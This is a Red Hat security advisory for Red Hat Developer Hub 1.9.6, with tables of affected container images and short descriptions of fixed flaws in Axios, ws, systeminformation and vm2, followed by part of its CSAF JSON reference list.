| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — |
Workaround
|
A flaw was found in Axios, a promise-based HTTP client, specifically in its Node.js HTTP adapter. When Axios is configured to use an authenticated proxy and follows a redirect, it may inadvertently send the Proxy-Authorization header, containing proxy credentials, to the redirect target. This can lead to the disclosure of sensitive proxy credentials to an unintended remote server.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
Workaround
|
A flaw was found in Axios. During specific proxy-to-direct redirect flows in the Node.js HTTP adapter, a remote attacker could exploit this vulnerability. The Proxy-Authorization header, which contains proxy credentials and is intended only for the outbound proxy, may be forwarded to the final redirected origin. This can lead to the disclosure of sensitive proxy credentials to an unintended third party.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
Workaround
|
A flaw was found in Axios, a promise-based HTTP client. When using the fetch adapter, Axios did not properly enforce configured request and response size limits. This vulnerability allows a remote attacker, through a malicious or compromised server, or by supplying a large data URL, to send or receive oversized data bodies. This can lead to resource exhaustion in server-side applications, resulting in a Denial of Service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
Workaround
|
A flaw was found in Axios, a promise-based HTTP client. This vulnerability occurs because Axios does not properly normalize IPv4-mapped IPv6 addresses. When a NO_PROXY setting is configured to block direct access to specific IPv4 addresses, an attacker can bypass this restriction by using the IPv4-mapped IPv6 form of the address in a request URL. This allows the request to be routed through the proxy, potentially exposing internal services or sensitive information that should otherwise be inaccessible.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
Workaround
|
A flaw was found in Axios. This vulnerability, a Prototype Pollution "Gadget" attack, allows an attacker to escalate any existing Object.prototype pollution in an application's dependency tree into a full Man-in-the-Middle (MITM) attack. This enables the attacker to intercept, read, and modify all HTTP traffic, including sensitive authentication credentials. The flaw occurs because the `config.proxy` setting is susceptible to prototype pollution, allowing an attacker to inject a malicious proxy server.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
Workaround
|
A flaw was found in Axios, a promise-based HTTP client. This vulnerability involves prototype pollution gadgets in the request configuration processing. If another vulnerability has already polluted the Object.prototype.transformResponse, affected Axios versions may incorrectly interpret this inherited value as part of the request configuration or as an option validator. Axios does not itself create the prototype pollution. Exploitability requires a separate prototype-pollution vulnerability or equivalent attacker control over Object.prototype before Axios creates a request.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
Workaround
|
A flaw was found in Axios. A remote attacker, by influencing the XSRF cookie name in a browser environment, could cause the application to construct a regular expression that leads to excessive processing. This can result in a client-side Denial of Service (DoS), where the affected browser tab may freeze, impacting the availability of the application for the user.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
Workaround
|
A flaw was found in systeminformation, a Node.js library. This vulnerability allows a local attacker on Linux to inject arbitrary commands. This occurs when an active NetworkManager connection profile name contains shell metacharacters, which are not properly sanitized before being used in shell commands. Successful exploitation can lead to arbitrary code execution.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
Workaround
|
A flaw was found in ws, an open source WebSocket client and server for Node.js. The `websocket.close()` implementation is vulnerable to uninitialized memory disclosure when a `TypedArray` is passed as the reason argument. This can lead to the disclosure of sensitive information from uninitialized memory.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — | ||
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
A flaw was found in vm2, an open-source virtual machine (VM) sandbox for Node.js. A remote attacker can exploit this vulnerability by combining specific Buffer function calls and Node.js's ERR_INVALID_ARG_TYPE error. This allows the attacker to obtain the host's TypeError constructor, leading to an escape from the sandbox. Consequently, this enables attackers to run arbitrary code on the host system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
Workaround
|
A flaw was found in vm2, an open-source virtual machine (VM) sandbox for Node.js. An attacker within the sandbox could exploit incomplete symbol interception and missing security checks to gain control over the host system. This could allow the attacker to execute arbitrary code outside the sandbox environment, leading to a complete compromise of the host.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
Workaround
|
A flaw was found in vm2, an open-source virtual machine (VM) sandbox for Node.js. A remote attacker could bypass a security check designed to prevent the combination of nested environments and disabled module loading. This bypass occurs because a strict equality check for the `require` option can be circumvented by simply omitting the option, leading to an unintended configuration. Successful exploitation of this vulnerability could allow an attacker to escape the sandbox and achieve arbitrary code execution on the host system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
Workaround
|
A flaw was found in vm2, a Node.js sandbox. This vulnerability allows sandboxed code to bypass network restrictions by utilizing internal HTTP built-ins, such as _http_client and _http_server. An attacker can exploit this to make outbound HTTP requests or open listening HTTP sockets, even when public network modules are explicitly denied. This could lead to unauthorized information disclosure or further compromise of the system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
Workaround
|
A flaw was found in vm2, an open-source virtual machine (VM) sandbox for Node.js. This vulnerability allows sandboxed code to bypass intended security restrictions by exploiting missing entries in the denylist for dangerous Node.js built-in functions, specifically `process` and `inspector/promises`. A remote attacker can leverage this to execute arbitrary code in the host process, leading to a complete compromise of the system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
Workaround
|
A flaw was found in vm2, an open-source virtual machine (VM) sandbox for Node.js. Prior to version 3.11.4, NodeVM, a component of vm2, improperly exposed certain process-wide observability builtins, such as diagnostics_channel, async_hooks, and perf_hooks. These builtins, which are designed for monitoring and debugging, were not adequately blocked by the dangerous builtin denylist. This oversight allowed sandboxed code to observe sensitive host application data, leading to information disclosure across the vm2 security boundary.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
Workaround
|
A flaw was found in vm2, an open-source virtual machine (VM) sandbox for Node.js. This vulnerability allows an attacker to escape the sandbox environment by writing malicious code. Successful exploitation can lead to arbitrary code execution on the host system, compromising the integrity and confidentiality of the system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
Workaround
|
A flaw was found in vm2, an open-source virtual machine (VM) sandbox for Node.js. This vulnerability allows an attacker to bypass security restrictions by writing dangerous cross-realm Symbol keys to host objects. This can lead to a compromise of the integrity of the host system, potentially enabling arbitrary code execution within the Node.js environment. The issue stems from the BaseHandler.set trap in bridge.js, which incorrectly writes to the host target object even when inherited property assignments should create an own property on the receiver.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — | ||
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
A flaw was found in ws, an open source WebSocket client and server. A remote attacker can exploit this memory exhaustion vulnerability by sending a high volume of exceptionally small fragments and data chunks. This action forces the affected component to allocate and hold structural wrappers that consume excessive memory. Consequently, this leads to process termination and a denial of service (DoS) for the remote peer.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
Workaround
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat Developer Hub 1.9.6 has been released.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Developer Hub (RHDH) is Red Hat\u0027s enterprise-grade, self-managed, customizable developer portal based on Backstage.io. RHDH is supported on OpenShift and other major Kubernetes clusters (AKS, EKS, GKE). The core features of RHDH include a single pane of glass, a centralized software catalog, self-service via golden path templates, and Tech Docs. RHDH is extensible by plugins.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:33574",
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27145",
"url": "https://access.redhat.com/security/cve/CVE-2026-27145"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-33811",
"url": "https://access.redhat.com/security/cve/CVE-2026-33811"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-39820",
"url": "https://access.redhat.com/security/cve/CVE-2026-39820"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42033",
"url": "https://access.redhat.com/security/cve/CVE-2026-42033"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42035",
"url": "https://access.redhat.com/security/cve/CVE-2026-42035"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42039",
"url": "https://access.redhat.com/security/cve/CVE-2026-42039"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42041",
"url": "https://access.redhat.com/security/cve/CVE-2026-42041"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42043",
"url": "https://access.redhat.com/security/cve/CVE-2026-42043"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42044",
"url": "https://access.redhat.com/security/cve/CVE-2026-42044"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42338",
"url": "https://access.redhat.com/security/cve/CVE-2026-42338"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42499",
"url": "https://access.redhat.com/security/cve/CVE-2026-42499"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44486",
"url": "https://access.redhat.com/security/cve/CVE-2026-44486"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44487",
"url": "https://access.redhat.com/security/cve/CVE-2026-44487"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44488",
"url": "https://access.redhat.com/security/cve/CVE-2026-44488"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44492",
"url": "https://access.redhat.com/security/cve/CVE-2026-44492"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44494",
"url": "https://access.redhat.com/security/cve/CVE-2026-44494"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44495",
"url": "https://access.redhat.com/security/cve/CVE-2026-44495"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44496",
"url": "https://access.redhat.com/security/cve/CVE-2026-44496"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44724",
"url": "https://access.redhat.com/security/cve/CVE-2026-44724"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-45736",
"url": "https://access.redhat.com/security/cve/CVE-2026-45736"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-47131",
"url": "https://access.redhat.com/security/cve/CVE-2026-47131"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-47135",
"url": "https://access.redhat.com/security/cve/CVE-2026-47135"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-47137",
"url": "https://access.redhat.com/security/cve/CVE-2026-47137"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-47139",
"url": "https://access.redhat.com/security/cve/CVE-2026-47139"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-47140",
"url": "https://access.redhat.com/security/cve/CVE-2026-47140"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-47141",
"url": "https://access.redhat.com/security/cve/CVE-2026-47141"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-47208",
"url": "https://access.redhat.com/security/cve/CVE-2026-47208"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-47209",
"url": "https://access.redhat.com/security/cve/CVE-2026-47209"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-48779",
"url": "https://access.redhat.com/security/cve/CVE-2026-48779"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-9277",
"url": "https://access.redhat.com/security/cve/CVE-2026-9277"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-9673",
"url": "https://access.redhat.com/security/cve/CVE-2026-9673"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://catalog.redhat.com/search?gs\u0026searchType=containers\u0026q=rhdh",
"url": "https://catalog.redhat.com/search?gs\u0026searchType=containers\u0026q=rhdh"
},
{
"category": "external",
"summary": "https://developers.redhat.com/rhdh/overview",
"url": "https://developers.redhat.com/rhdh/overview"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_developer_hub",
"url": "https://docs.redhat.com/en/documentation/red_hat_developer_hub"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHDHBUGS-3081",
"url": "https://issues.redhat.com/browse/RHDHBUGS-3081"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHDHBUGS-3369",
"url": "https://issues.redhat.com/browse/RHDHBUGS-3369"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-13319",
"url": "https://issues.redhat.com/browse/RHIDP-13319"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-13408",
"url": "https://issues.redhat.com/browse/RHIDP-13408"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-13446",
"url": "https://issues.redhat.com/browse/RHIDP-13446"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-13451",
"url": "https://issues.redhat.com/browse/RHIDP-13451"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-13457",
"url": "https://issues.redhat.com/browse/RHIDP-13457"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-13488",
"url": "https://issues.redhat.com/browse/RHIDP-13488"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-13966",
"url": "https://issues.redhat.com/browse/RHIDP-13966"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-14572",
"url": "https://issues.redhat.com/browse/RHIDP-14572"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-14597",
"url": "https://issues.redhat.com/browse/RHIDP-14597"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-14703",
"url": "https://issues.redhat.com/browse/RHIDP-14703"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-14733",
"url": "https://issues.redhat.com/browse/RHIDP-14733"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-14735",
"url": "https://issues.redhat.com/browse/RHIDP-14735"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-14736",
"url": "https://issues.redhat.com/browse/RHIDP-14736"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-14738",
"url": "https://issues.redhat.com/browse/RHIDP-14738"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-14740",
"url": "https://issues.redhat.com/browse/RHIDP-14740"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-14743",
"url": "https://issues.redhat.com/browse/RHIDP-14743"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-14744",
"url": "https://issues.redhat.com/browse/RHIDP-14744"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-14831",
"url": "https://issues.redhat.com/browse/RHIDP-14831"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-14835",
"url": "https://issues.redhat.com/browse/RHIDP-14835"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-14837",
"url": "https://issues.redhat.com/browse/RHIDP-14837"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-14895",
"url": "https://issues.redhat.com/browse/RHIDP-14895"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-14936",
"url": "https://issues.redhat.com/browse/RHIDP-14936"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-14937",
"url": "https://issues.redhat.com/browse/RHIDP-14937"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-14939",
